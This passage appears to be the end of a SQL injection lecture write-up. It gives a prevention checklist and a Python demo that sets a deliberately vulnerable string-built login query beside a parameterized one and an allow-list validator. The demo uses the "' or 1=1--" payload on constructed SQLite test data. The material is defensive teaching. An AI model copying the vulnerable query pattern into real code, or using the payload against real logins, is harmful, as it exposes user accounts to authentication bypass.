     o   Normalize input (decode and canonicalize) before validating, so the encoding tricks above cannot slip past the check
     o   Whitelists of permitted values or formats
     o   Built-in validation and escaping functions of the platform
     o   Regular expressions anchored to the whole value
     o   Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
•   Stored Procedures, only where they do not build dynamic SQL with EXEC or sp_executesql from unparameterized input
•   Accounts with Least Privilege: the application login must not be sa, dbo or a sysadmin member
•   Disable ad hoc remote queries: the DisallowAdhocAccess registry setting on SQL Server 2000; sp_configure 'Ad Hoc Distributed Queries', 0 on 2005 and later (the default). Leave xp_cmdshell disabled.
•   Perform Self Assessments
•   Use a Web Application Firewall, configured to normalize input before matching (see WAF Evasion)
•   Filter Outbound Traffic at Firewall: the exfiltration, upload and port-scanning techniques above all depend on the database server making outbound connections
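The prevention slide lists parameterized queries and whitelists without showing the difference they make. This added example, written for this page and not taken from the slides, puts the dynamic login query from the SQL Injection Basics slide beside its parameterized form and adds an allow-list for the posts.php id parameter. The users table and its credentials are constructed test data in an in-memory SQLite database; least privilege is not shown because SQLite has no logins, and on SQL Server it would mean an application login with no sysadmin or db_owner membership on top of what is shown here.

```python
"""Vulnerable login beside the parameterized one, plus allow-list validation.

Constructed test data in SQLite; not the code of any project on the page.
"""
import re
import sqlite3


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users(user TEXT, pwd TEXT);
        INSERT INTO users VALUES ('alice', 'correct horse');
        INSERT INTO users VALUES ('bob',   'battery staple');
        """
    )
    return db


def login_vulnerable(db, uname, pword):
    """Dynamic construction, as on the Basics slide: input becomes SQL text."""
    sql = ("SELECT * FROM users WHERE user = '" + uname
           + "' AND pwd = '" + pword + "'")
    return db.execute(sql).fetchall()


def login_parameterized(db, uname, pword):
    """Same query with bound parameters: the values can never become SQL."""
    return db.execute(
        "SELECT * FROM users WHERE user = ? AND pwd = ?", (uname, pword)
    ).fetchall()


# Allow-list for posts.php?id=: a positive integer and nothing else.
POST_ID = re.compile(r"[1-9][0-9]{0,9}")


def parse_post_id(raw):
    """Normalize (trim) then allow-list the id parameter; int or None."""
    raw = raw.strip()
    return int(raw) if POST_ID.fullmatch(raw) else None


def demo():
    """Run the slide's ' or 1=1-- payload through both logins and the id filter."""
    db = build_db()
    payload = "' or 1=1--"
    return {
        "vulnerable_rows": len(login_vulnerable(db, payload, "anything")),
        "parameterized_rows": len(login_parameterized(db, payload, "anything")),
        "valid_login_rows": len(login_parameterized(db, "alice", "correct horse")),
        "id_ok": parse_post_id("2"),
        "id_injected": parse_post_id("2 and 1=1"),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable login returns every user for the payload because the comment swallows the password check; the parameterized one returns nothing because the payload is looked up as a literal user name. Note that parse_post_id() rejects rather than cleans: stripping "bad" characters from "2 and 1=1" would be the sanitization approach the WAF Evasion slides show being bypassed.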
Q&A